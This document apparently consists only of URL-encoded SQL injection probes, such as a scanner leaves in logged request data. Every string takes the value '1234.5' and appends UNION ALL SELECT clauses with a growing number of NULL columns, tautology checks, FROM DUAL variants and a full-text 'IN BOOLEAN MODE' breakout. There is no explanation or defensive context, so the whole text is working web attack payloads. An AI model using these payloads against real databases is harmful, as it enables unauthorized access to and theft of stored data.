1234.5%20%2B%20%28SELECT%207391%20WHERE%205340%3D5340%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%207082%20WHERE%201963%3D1963%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%206238%20WHERE%207661%3D7661%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%208809%20WHERE%201655%3D1655%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%205044%20WHERE%205519%3D5519%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%205490%20WHERE%202525%3D2525%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%27%20%2B%20%28SELECT%20%27rybQ%27%20FROM%20DUAL%20WHERE%205289%3D5289%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27OrkV%27%20FROM%20DUAL%20WHERE%207097%3D7097%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27RqMV%27%20FROM%20DUAL%20WHERE%202016%3D2016%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27tKUZ%27%20FROM%20DUAL%20WHERE%203402%3D3402%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27ngon%27%20FROM%20DUAL%20WHERE%208806%3D8806%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27FVbU%27%20FROM%20DUAL%20WHERE%202332%3D2332%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27ZnJV%27%20FROM%20DUAL%20WHERE%204021%3D4021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27XuPP%27%20FROM%20DUAL%20WHERE%202339%3D2339%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27BXPt%27%20FROM%20DUAL%20WHERE%209562%3D9562%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27FWYW%27%20FROM%20DUAL%20WHERE%201659%3D1659%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27tFlj%27%20WHERE%205995%3D5995%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27XJum%27%20WHERE%204267%3D4267%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27porh%27%20WHERE%201580%3D1580%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27xZRD%27%20WHERE%205469%3D5469%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27USkG%27%20WHERE%204813%3D4813%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27VMgm%27%20WHERE%208169%3D8169%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27qCrZ%27%20WHERE%208117%3D8117%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27ereW%27%20WHERE%203408%3D3408%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27tFEm%27%20WHERE%207687%3D7687%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27ZLjh%27%20WHERE%202495%3D2495%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 